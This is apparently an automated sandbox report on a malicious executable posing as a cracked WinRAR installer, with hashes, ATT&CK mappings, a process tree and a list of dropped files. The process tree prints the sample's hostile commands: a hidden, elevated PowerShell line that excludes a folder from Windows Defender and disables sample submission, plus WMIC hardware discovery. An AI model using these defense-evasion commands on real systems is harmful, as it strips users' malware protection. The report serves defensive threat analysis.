eff920ad73b1bd4d2def6b79a52c4fe0f449902044c8efbbdf65afbdf93ef410

Analysis

max time kernel
103s
max time network
118s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19/11/2024, 18:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WinRAR Pro 2024 - Full Active.exe
Size

68.0MB
MD5

cb99bf277bf6e71fb3edf8a199f7adc5
SHA1

a6078f9bf44068575038e69e92f0909e3bf7d865
SHA256

651a4891b463ac1de513bf3d72375e7dc65edf276f02b10276474df11dae1dca
SHA512

495cb91b49fcd517b425e59e6289440941e4b105041c26f691257f469b6477f4d97356d07f01b455fb0423da909f6dc7b002843a40f95267c8308245b05a9fd6
SSDEEP

393216:rgCu0Q3uHpM43Gftr3YXekHkY8WY/wsp6AeSrpXZx4CwWcr+LLHizaCuzLzKoenv:0rb1NrPJzW8DKLtElx7hEjV5P7h5

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4908	powershell.exe
4880	powershell.exe
4532	powershell.exe
4876	powershell.exe
4740	powershell.exe
4880	powershell.exe
4908	powershell.exe

Patched UPX-packed file 1 IoCs

Sample is packed with UPX but required header fields are zeroed out to prevent unpacking with the default UPX tool.

resource	yara_rule
behavioral4/files/0x0007000000023d74-479.dat	patched_upx

Executes dropped EXE 4 IoCs

pid	Process
3340	e7za.exe
2796	php.exe
3032	rhc.exe
1072	php.exe

Loads dropped DLL 33 IoCs

pid	Process
2796	php.exe
2796	php.exe
2796	php.exe
2796	php.exe
2796	php.exe
2796	php.exe
2796	php.exe
2796	php.exe
2796	php.exe
2796	php.exe
2796	php.exe
2796	php.exe
2796	php.exe
2796	php.exe
2796	php.exe
2796	php.exe
2796	php.exe
1072	php.exe
1072	php.exe
1072	php.exe
1072	php.exe
1072	php.exe
1072	php.exe
1072	php.exe
1072	php.exe
1072	php.exe
1072	php.exe
1072	php.exe
1072	php.exe
1072	php.exe
1072	php.exe
1072	php.exe
1072	php.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e7za.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhc.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4500	WMIC.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-493223053-2004649691-1575712786-1000\{63F41DCE-B67B-4016-ABE5-DC4A562A660C}	WinRAR Pro 2024 - Full Active.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-493223053-2004649691-1575712786-1000\{3DD0651D-103B-4D12-8CF8-6E26126342E4}	WinRAR Pro 2024 - Full Active.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
4880	powershell.exe
4880	powershell.exe
4908	powershell.exe
4532	powershell.exe
4532	powershell.exe
4908	powershell.exe
4876	powershell.exe
4876	powershell.exe
4740	powershell.exe
4740	powershell.exe
4740	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeDebugPrivilege	4908	powershell.exe
Token: SeDebugPrivilege	4532	powershell.exe
Token: SeDebugPrivilege	4876	powershell.exe
Token: SeDebugPrivilege	4740	powershell.exe
Token: SeIncreaseQuotaPrivilege	4500	WMIC.exe
Token: SeSecurityPrivilege	4500	WMIC.exe
Token: SeTakeOwnershipPrivilege	4500	WMIC.exe
Token: SeLoadDriverPrivilege	4500	WMIC.exe
Token: SeSystemProfilePrivilege	4500	WMIC.exe
Token: SeSystemtimePrivilege	4500	WMIC.exe
Token: SeProfSingleProcessPrivilege	4500	WMIC.exe
Token: SeIncBasePriorityPrivilege	4500	WMIC.exe
Token: SeCreatePagefilePrivilege	4500	WMIC.exe
Token: SeBackupPrivilege	4500	WMIC.exe
Token: SeRestorePrivilege	4500	WMIC.exe
Token: SeShutdownPrivilege	4500	WMIC.exe
Token: SeDebugPrivilege	4500	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4500	WMIC.exe
Token: SeRemoteShutdownPrivilege	4500	WMIC.exe
Token: SeUndockPrivilege	4500	WMIC.exe
Token: SeManageVolumePrivilege	4500	WMIC.exe
Token: 33	4500	WMIC.exe
Token: 34	4500	WMIC.exe
Token: 35	4500	WMIC.exe
Token: 36	4500	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4500	WMIC.exe
Token: SeSecurityPrivilege	4500	WMIC.exe
Token: SeTakeOwnershipPrivilege	4500	WMIC.exe
Token: SeLoadDriverPrivilege	4500	WMIC.exe
Token: SeSystemProfilePrivilege	4500	WMIC.exe
Token: SeSystemtimePrivilege	4500	WMIC.exe
Token: SeProfSingleProcessPrivilege	4500	WMIC.exe
Token: SeIncBasePriorityPrivilege	4500	WMIC.exe
Token: SeCreatePagefilePrivilege	4500	WMIC.exe
Token: SeBackupPrivilege	4500	WMIC.exe
Token: SeRestorePrivilege	4500	WMIC.exe
Token: SeShutdownPrivilege	4500	WMIC.exe
Token: SeDebugPrivilege	4500	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4500	WMIC.exe
Token: SeRemoteShutdownPrivilege	4500	WMIC.exe
Token: SeUndockPrivilege	4500	WMIC.exe
Token: SeManageVolumePrivilege	4500	WMIC.exe
Token: 33	4500	WMIC.exe
Token: 34	4500	WMIC.exe
Token: 35	4500	WMIC.exe
Token: 36	4500	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2632	WMIC.exe
Token: SeSecurityPrivilege	2632	WMIC.exe
Token: SeTakeOwnershipPrivilege	2632	WMIC.exe
Token: SeLoadDriverPrivilege	2632	WMIC.exe
Token: SeSystemProfilePrivilege	2632	WMIC.exe
Token: SeSystemtimePrivilege	2632	WMIC.exe
Token: SeProfSingleProcessPrivilege	2632	WMIC.exe
Token: SeIncBasePriorityPrivilege	2632	WMIC.exe
Token: SeCreatePagefilePrivilege	2632	WMIC.exe
Token: SeBackupPrivilege	2632	WMIC.exe
Token: SeRestorePrivilege	2632	WMIC.exe
Token: SeShutdownPrivilege	2632	WMIC.exe
Token: SeDebugPrivilege	2632	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2632	WMIC.exe
Token: SeRemoteShutdownPrivilege	2632	WMIC.exe
Token: SeUndockPrivilege	2632	WMIC.exe
Token: SeManageVolumePrivilege	2632	WMIC.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 5092 wrote to memory of 1912	5092	WinRAR Pro 2024 - Full Active.exe	84
PID 5092 wrote to memory of 1912	5092	WinRAR Pro 2024 - Full Active.exe	84
PID 5092 wrote to memory of 4880	5092	WinRAR Pro 2024 - Full Active.exe	85
PID 5092 wrote to memory of 4880	5092	WinRAR Pro 2024 - Full Active.exe	85
PID 5092 wrote to memory of 2092	5092	WinRAR Pro 2024 - Full Active.exe	87
PID 5092 wrote to memory of 2092	5092	WinRAR Pro 2024 - Full Active.exe	87
PID 4880 wrote to memory of 4908	4880	powershell.exe	88
PID 4880 wrote to memory of 4908	4880	powershell.exe	88
PID 5092 wrote to memory of 4532	5092	WinRAR Pro 2024 - Full Active.exe	90
PID 5092 wrote to memory of 4532	5092	WinRAR Pro 2024 - Full Active.exe	90
PID 4532 wrote to memory of 3340	4532	powershell.exe	92
PID 4532 wrote to memory of 3340	4532	powershell.exe	92
PID 4532 wrote to memory of 3340	4532	powershell.exe	92
PID 5092 wrote to memory of 4876	5092	WinRAR Pro 2024 - Full Active.exe	98
PID 5092 wrote to memory of 4876	5092	WinRAR Pro 2024 - Full Active.exe	98
PID 4876 wrote to memory of 2796	4876	powershell.exe	100
PID 4876 wrote to memory of 2796	4876	powershell.exe	100
PID 2796 wrote to memory of 2632	2796	php.exe	101
PID 2796 wrote to memory of 2632	2796	php.exe	101
PID 2632 wrote to memory of 4740	2632	cmd.exe	102
PID 2632 wrote to memory of 4740	2632	cmd.exe	102
PID 5092 wrote to memory of 2608	5092	WinRAR Pro 2024 - Full Active.exe	105
PID 5092 wrote to memory of 2608	5092	WinRAR Pro 2024 - Full Active.exe	105
PID 3032 wrote to memory of 1072	3032	rhc.exe	115
PID 3032 wrote to memory of 1072	3032	rhc.exe	115
PID 1072 wrote to memory of 3520	1072	php.exe	117
PID 1072 wrote to memory of 3520	1072	php.exe	117
PID 3520 wrote to memory of 4500	3520	cmd.exe	118
PID 3520 wrote to memory of 4500	3520	cmd.exe	118
PID 1072 wrote to memory of 3504	1072	php.exe	119
PID 1072 wrote to memory of 3504	1072	php.exe	119
PID 3504 wrote to memory of 2632	3504	cmd.exe	120
PID 3504 wrote to memory of 2632	3504	cmd.exe	120

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\WinRAR Pro 2024 - Full Active.exe
"C:\Users\Admin\AppData\Local\Temp\WinRAR Pro 2024 - Full Active.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5092
- C:\Users\Admin\AppData\Local\Temp\WinRAR Pro 2024 - Full Active.exe
  "C:\Users\Admin\AppData\Local\Temp\WinRAR Pro 2024 - Full Active.exe" --type=gpu-process --enable-features=FixAltGraph --no-sandbox --gpu-preferences=KAAAAAAAAACAAwCAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=B0D2121307EEFE29487830DD7EFC7903 --mojo-platform-channel-handle=1376 /prefetch:2
  2⤵
  - Modifies registry class
  PID:1912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Start-Process powershell -ArgumentList '-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath \"\"\"C:\Users\Admin\AppData\Local\"\"\";Set-MpPreference -MAPSReporting Disable;Set-MpPreference -SubmitSamplesConsent NeverSend;' -Verb RunAs"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4880
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath """C:\Users\Admin\AppData\Local""";Set-MpPreference -MAPSReporting Disable;Set-MpPreference -SubmitSamplesConsent NeverSend;
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4908
- C:\Users\Admin\AppData\Local\Temp\WinRAR Pro 2024 - Full Active.exe
  "C:\Users\Admin\AppData\Local\Temp\WinRAR Pro 2024 - Full Active.exe" --type=gpu-process --enable-features=FixAltGraph --no-sandbox --gpu-preferences=KAAAAAAAAACAAwCAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --service-request-channel-token=D682C350545247B677907471544DFE65 --mojo-platform-channel-handle=1352 /prefetch:2
  2⤵
  - Modifies registry class
  PID:2092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "& 'C:\Users\Admin\AppData\Local\Sredmiker\e7za.exe' x plendix -p\"zkT5QjZ7w8I0A9m6yK2p\" -aoa"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4532
- - C:\Users\Admin\AppData\Local\Sredmiker\e7za.exe
    "C:\Users\Admin\AppData\Local\Sredmiker\e7za.exe" x plendix -pzkT5QjZ7w8I0A9m6yK2p -aoa
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "& 'C:\Users\Admin\AppData\Local\Sredmiker\php.exe' include.php"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4876
- - C:\Users\Admin\AppData\Local\Sredmiker\php.exe
    "C:\Users\Admin\AppData\Local\Sredmiker\php.exe" include.php
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2796
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c "PowerShell -executionpolicy bypass -File time.ps1"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2632
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -executionpolicy bypass -File time.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4740
- C:\Users\Admin\AppData\Local\Temp\WinRAR Pro 2024 - Full Active.exe
  "C:\Users\Admin\AppData\Local\Temp\WinRAR Pro 2024 - Full Active.exe" --type=renderer --no-sandbox --enable-features=FixAltGraph --service-pipe-token=90BD25150D9C5CD5876BAD935CB23806 --lang --app-path="C:\Users\Admin\AppData\Local\Temp\resources\app.asar" --node-integration=false --webview-tag=false --no-sandbox --context-isolation --background-color=#fff --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-compositor-image-animations --service-request-channel-token=90BD25150D9C5CD5876BAD935CB23806 --renderer-client-id=5 --mojo-platform-channel-handle=1960 /prefetch:1
  2⤵
  PID:2608

C:\Users\Admin\AppData\Local\Sredmiker\rhc.exe
C:\Users\Admin\AppData\Local\Sredmiker\rhc.exe php.exe index.php
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3032
- C:\Users\Admin\AppData\Local\Sredmiker\php.exe
  php.exe index.php
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1072
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3520
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4500
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "wmic CPU get NAME"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3504
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic CPU get NAME
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
367b1c81198bfdcdba813c2c336627a3

SHA1
37fe6414eafaaed4abb91c1aafde62c5b688b711

SHA256
1141e163d84d5ef0038593c866647f27c55510de2147dc1578130e518a22cced

SHA512
e0493957e6602efb156d372e5e66147056f6e3c2e01996ba9b4e04f82b2b1e4c7236d0e3681dce9ab4911a62546b6a141f1ae731de6e8184e758caf120cf594b

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\VCRUNTIME140.dll

Filesize
93KB

MD5
4a365ffdbde27954e768358f4a4ce82e

SHA1
a1b31102eee1d2a4ed1290da2038b7b9f6a104a3

SHA256
6a0850419432735a98e56857d5cfce97e9d58a947a9863ca6afadd1c7bcab27c

SHA512
54e4b6287c4d5a165509047262873085f50953af63ca0dcb7649c22aba5b439ab117a7e0d6e7f0a3e51a23e28a255ffd1ca1ddce4b2ea7f87bca1c9b0dbe2722

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\e7za.exe

Filesize
574KB

MD5
42badc1d2f03a8b1e4875740d3d49336

SHA1
cee178da1fb05f99af7a3547093122893bd1eb46

SHA256
c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf

SHA512
6bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_bz2.dll

Filesize
86KB

MD5
734c9075926844a51bf5fe8aaecfb751

SHA1
6add19a0dbd8bc15f40183c80822e57af178c3ff

SHA256
59d7b6959001cd9109d4ccd0410adbc1a7d4cfb0d83cd04328c6e16197bf7370

SHA512
9260a428cffe1e1e2621398c944854dbc7c6628fd878ed135f213824b62340e2cefe5262f9b7039e0e23d1a9151d7cf8a3b39df899dbd9c3256104d95d5feffb

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_com_dotnet.DLL

Filesize
87KB

MD5
fab4daf7d5b727bf4ebb3907c533bccc

SHA1
70cfe7bcd87fffde2223c409c89dbeb71b494b4a

SHA256
987ec3151942e211195ab36af22bc563ca528e0215714eb67f74189e2aacf34d

SHA512
b8438c03b8398802066c525572dd37ffc198e2f5efc6a2e83f06fdc2c71e7224760b780728ccf570b3f68c31cd9119a70174b7efda550b2403a1b8c61994d73e

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_curl.dll

Filesize
519KB

MD5
d1c6dbda0b43b617f6dec4df00d1a279

SHA1
70c11039449e3c6d52ec5d73297faf602079f80b

SHA256
b8a9deacf3d1f54b9184a37be8fc5fce545a029a8681687872fb2e78110c485c

SHA512
fc89f0773e0045f0accae86f5a5dd6d240a97b9df832316086f6ae64a053cc40f0da144ff4543efb4ce67818aa7134d7e9765cfe5a7544df9329c2d592c1d033

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_fileinfo.dll

Filesize
4.8MB

MD5
80fe7da4d37fdcd313eab184bca3af62

SHA1
e44733a0be9d40457bda7068f7f8d026a90b5195

SHA256
f50f7c7eb3fe3fc7abfa9bfc869f48a7c44e65a6b7203190cb9402f7d90fc27a

SHA512
2df31147a0e37ecb9f02bb6296aca2e6cfb661f01bfdb22aa5898756d07083d0f5e4f200e2c3074362e3118b2b4b5674daf72a05d01acb2749789cfaa8ae47e3

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_gd2.dll

Filesize
1.5MB

MD5
89028ff306c3ea6736e2f61c821c33f3

SHA1
adee094e6929d04bea70aaf3c2d6ef8d19b15ede

SHA256
5276f87ba956a4d1d7f80371763215dca69b38240e42486652ed5655a702d3d9

SHA512
298e97bad9b3ee50d104905f63ed7eda8e8bdb64490a4b1cecf946bb36ae08e6fd14978942b5e3f94d7fdfd8641bdb4b2c61a688ab91e23224a50b74b222139f

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_ioncube.dll

Filesize
880KB

MD5
74b5ec763ea8e4b87a503b6eeb6a27a2

SHA1
cf46f5692f4b3a3b937f1d7e50f177a26097ae7f

SHA256
7eae76a36fa5440b996b09520c252ab5014b5a9fbe9bcbe57231fbda75c7f7f3

SHA512
28557d6a644d577706d95f5be54760e2417c0899bd180a1c1e8169d935988aed9dbe53ed6a1202e2101f1d1912ba2d450e44ec15a6e3b8dc0f95509c52d174c4

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_mbstring.dll

Filesize
1.4MB

MD5
925641312da1980050060faf78481afe

SHA1
c563204f01a3b725643eaff426e2e2255454b529

SHA256
c7b5ad31a5430f836767436be3c58e0b630610745673b2a9e462182bddbce3b0

SHA512
cfc65adcf891abc1ce7c71150b8b0effda5fa1a11f601900229954518fb8cea855c9248ff93853a603998da11c4be4844c0df64a7977881bc9d736b914eac84e

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_openssl.dll

Filesize
119KB

MD5
8703f70d3666a887e3099875f3fac5d9

SHA1
c558fc6ed4f2bb7f869a18abb6433d85014ec44a

SHA256
b5d074368cfb82896719321637dac2b539df2367a373cc71e34b0573323dce1b

SHA512
b1e8672214fc6dd87e09f051b59b8650abd8ab780128c424f130e79fa5fa0c536d7b7318ed3c3039b49deaf1920709d0c693c0fb17bbe59444f657cfe7949361

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_pdo_sqlite.dll

Filesize
856KB

MD5
fc034e6e3b86aaffb2b621de4985e2a4

SHA1
7522d5e35e3b4cc15b2ad15b56366e24156d91ce

SHA256
2a218f72e76a913ecf214ee224350f9a820730a3d514718a27d038cdc43d5672

SHA512
8513f965d59325542f862d2e5268ad9bae423fd7566b6239b37ca0572103e614d7e08fe1cf5dc3855b08d6f94b221cc3dab307fa212152150b86dd7231bec9a6

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\include.php

Filesize
8KB

MD5
9c8c85f8bb6826f431482fafd4da5a0a

SHA1
a94eec82fe6ff920af74611b621e47a57b7a9752

SHA256
09cf3947fc35ea136dfc1ec121fb0da9732d2c632b14f01be43164f30441ff7b

SHA512
8f109928c01f88a3b9b7040ef698efb345945a4bcc5b57d7ad1c40dfc9b902947d20f0b8d2f0d8626cd31f209f72840db9a06c446cc0c3f7dc64f1ebcc9608f4

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\libcrypto-1_1-x64.dll

Filesize
2.9MB

MD5
784eac5c1d5f17c9aabe6022fb4d190a

SHA1
717215ebd43fa26332cf6f6aa9d8e243b25c52ee

SHA256
1d02feb7210afe246eca7ebd052dbceb214d179ccb458186d4181bd4b5538af4

SHA512
556830f901f0c4d58d7da7b4774c8813454597805d2cc1f33a40cae8cd80da101e7958d65d5fb94b7b97f623befbcc59570050938e8fa5d836b1c9f2a1ac960c

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\libssh2.dll

Filesize
218KB

MD5
7aa3260787e11bc0309311ad9e67b5b0

SHA1
81e31c18ca8100581e6bf721d20c3c30ccef3dd9

SHA256
e413d17d40bfa46fb946dd31dfec17366481d287582f803f3399c1aa360ae748

SHA512
59ec506ab012e48eeca1f5a8f1cbe959024bbd454e4733b66f527ffd03f70a7242d3c722964e65cf800450dd7ca7cd1eae60bb026fd4e1b4b44c1dab6d95ca8c

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\libssl-1_1-x64.dll

Filesize
505KB

MD5
6e58c06e745ceb9cd282e6f38fbe0527

SHA1
de8759ce2cab7e9875757963ca72ed33f71c58e1

SHA256
928d7f65f2e0594595b46aaf645e45b59c287074cdc8d80d707da65d46630c23

SHA512
ebdfff987c4c51ae27fa6183443867261ba0bb1248b81b671888143e81f6d64cf26cda44974f97a5ea66854ab4ae622c6684668a63ad8158267f40112baabc13

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\nghttp2.dll

Filesize
194KB

MD5
3050e106c606b480a80c950e1466d2d1

SHA1
66792a5f379deff2545f1dec7e6f94812ea47da4

SHA256
aa6ec793d436f312215afbcc090ae65cb444b79b80ecc6bdf826322ce6f534a5

SHA512
7621cbca7ec4babf4a8379e81104eda74a9429566c5922d5c9ca93f5acb3bf9aae6d861d9a16ce9bff0531d3ebc39ca8b06ddfd4941df37ab8efca3d28edfeaf

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\php.exe

Filesize
123KB

MD5
8db8ff7802efe20753a50e3653703740

SHA1
05ceaf802e222f254c8e09bae6753b81f638d260

SHA256
d09c3c5bdeac44d08a4be559111a6790a34b0b636d3f4749949c43e6e21c544b

SHA512
f73af38eff7d60be7c227fe2cc9ce8f846451b1d8764c550286e9dfac305e0c45b683d7a504a302d5f22f91cbed75ac969943919c850b19f3d0d852bc1cb5d5d

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\php.ini

Filesize
70KB

MD5
5fa10fbd9cdcdefa94e497a4b2d2b813

SHA1
2b278a10e9967b9076a027e69f910bf215f2a035

SHA256
e9796c19589b948b7fdd5f300e055c0bbbafbfbabbb36b109d13e185fec0e4ed

SHA512
c6664f68bff8009a0b75d2c1b440d00141ffe903a6fc6c0782bfa9a96cf74d0dbc5e6b52727afb0953e2a74c558001fb56b8fd4386fd562c027bd4aa913f510c

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\php7.dll

Filesize
8.5MB

MD5
4e3849e0765c159ad32c6eaaf67106c9

SHA1
d0927fbcd56bb84be43531542c4bc3e1cb2b3d63

SHA256
0808805eb42a75341c3ea2b31d330eb23df5dd222c8ec0ae1df4037d536165f4

SHA512
5ddb90cf732e00859635ba292e1c8560aa2f4d438f5dc5cf0d468a537848390ed28417ee295c1b2e894ca7141b0dc526702238fdf71a4ccca8e3f1d934d9e4f6

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\rhc.exe

Filesize
1KB

MD5
abc6379205de2618851c4fcbf72112eb

SHA1
1ed7b1e965eab56f55efda975f9f7ade95337267

SHA256
22e7528e56dffaa26cfe722994655686c90824b13eb51184abfe44d4e95d473f

SHA512
180c7f400dd13092b470e3a91bf02e98ef6247c1193bf349e3710e8d1e9003f3bc9b792bb776eacb746e9c67b3041f2333cc07f28c5f046d59274742230fb7c1

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\time.ps1

Filesize
38B

MD5
c9f2ae7f3ca095206938e20163027e1f

SHA1
2e3c1978f5c683b7d025ff237adb6da0d812ab23

SHA256
5a7767a230d5d86b37818702585ac4316fdc3a35b8c579e2cdd2aed933d2487f

SHA512
0cf7eb83fd484dab1e1b3484e9db0695c1fbf6840293f77e08fe8baa6d86810f0dce9df49aa2d71bb08196a18e0186de63bec7578ab69a444039af068276d08c

Download Submit
C:\Users\Admin\AppData\Local\Temp\9bdff237-5b2b-4183-8377-cd1c411118db.tmp

Filesize
9.8MB

MD5
f890cab9cf204e2af5b422ed0d19c9b5

SHA1
fc1bb3df77d13af3fde9d1b2c5f29c6397611a31

SHA256
5820c778afb230843fc3d5c867b20da9beebe9debcc02ddb4690f8d80924a9ce

SHA512
1dba2f45c8308ac69e85d57ba01c2e6ea67f1d758ee1ca010a795f518a9932a79ebb03cf8ba6af59d33ceeb92d399dc39831c0bd6df1ff9d0a273866a5ca5014

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ndmepz2m.jqr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
8da8c432086dcde318ea34d90d1b88e0

SHA1
8e752d1bd12e738d71762e776d5eea8621296f74

SHA256
4b1730d38f07f0d4c8254f38b8089ee6d8a6ca906233af35430d9c7004d8d3d1

SHA512
a8698196c65e7acdcbed059262a0ef08cfe59993644ac5e9c72307bbcd056cb0e117cf02d7a1f6d72df514e31aeae64a225a3703cecf9749347b77982122b4d7

Download Submit
